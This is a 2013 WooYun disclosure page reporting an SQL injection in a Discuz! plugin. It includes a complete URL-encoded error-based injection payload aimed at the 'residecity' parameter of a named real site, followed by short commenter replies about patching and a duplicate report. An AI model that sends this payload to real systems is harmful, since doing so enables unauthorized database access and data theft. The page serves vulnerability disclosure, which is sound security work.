当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023213

漏洞标题:Discuz!插件注入漏洞

相关厂商:Discuz!

漏洞作者: leehenwu

提交时间:2013-05-07 11:39

修复时间:2013-05-12 11:39

公开时间:2013-05-12 11:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-07: 细节已通知厂商并且等待厂商处理中
2013-05-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Discuz!插件注入漏洞

详细说明:

GET
http://www.trueqq.com/jiaoyou.php?mod=search&residecity=%27%20or%20@%60%27%60%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28user%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20or%20@%60%27%60%20and%20%271%27=%271
residecity
resideprovince
参数过滤不严

漏洞证明:

QQ截图20130507113841.png

修复方案:

你懂的

版权声明:转载请注明来源 leehenwu@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-05-12 11:39

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2013-05-07 12:05 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    插入DZ

  2. 2013-05-07 13:33 | 堕络 ( 路人 | Rank:20 漏洞数:2 | 一个新手菜鸟 求关爱)

    洞主 插进去了..

  3. 2013-05-07 15:58 | 哎呀 ( 实习白帽子 | Rank:79 漏洞数:8 | 忙啊!!!)

    ucenter + home ????

  4. 2013-05-07 21:43 | rico ( 路人 | Rank:10 漏洞数:1 | 码农一名)

    太猛了,看着cookie被拿走

  5. 2013-05-07 23:28 | kookxiang ( 路人 | Rank:28 漏洞数:6 | 苦逼PHP程序猿…)

    这应该是第三方干的吧……官方估计不好管

  6. 2013-05-12 13:04 | 乌云合作伙伴-知道创宇(乌云厂商)

    这个插件的官方还是比较重视安全的,白帽子可以厂商可以直接写插件开发的公司.另外这个漏洞官方已经修补了。http://bbs.jiasule.com/thread-3260-1-1.html dz最新版本也加强了通用过滤的防御。文章里的bypass不行了 :)

  7. 2013-08-07 16:56 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    @leehenwu 我说你这孩子二的 这漏洞我早就提交了 你那捡来的 咋又提交一次 http://wooyun.org/bugs/wooyun-2010-021788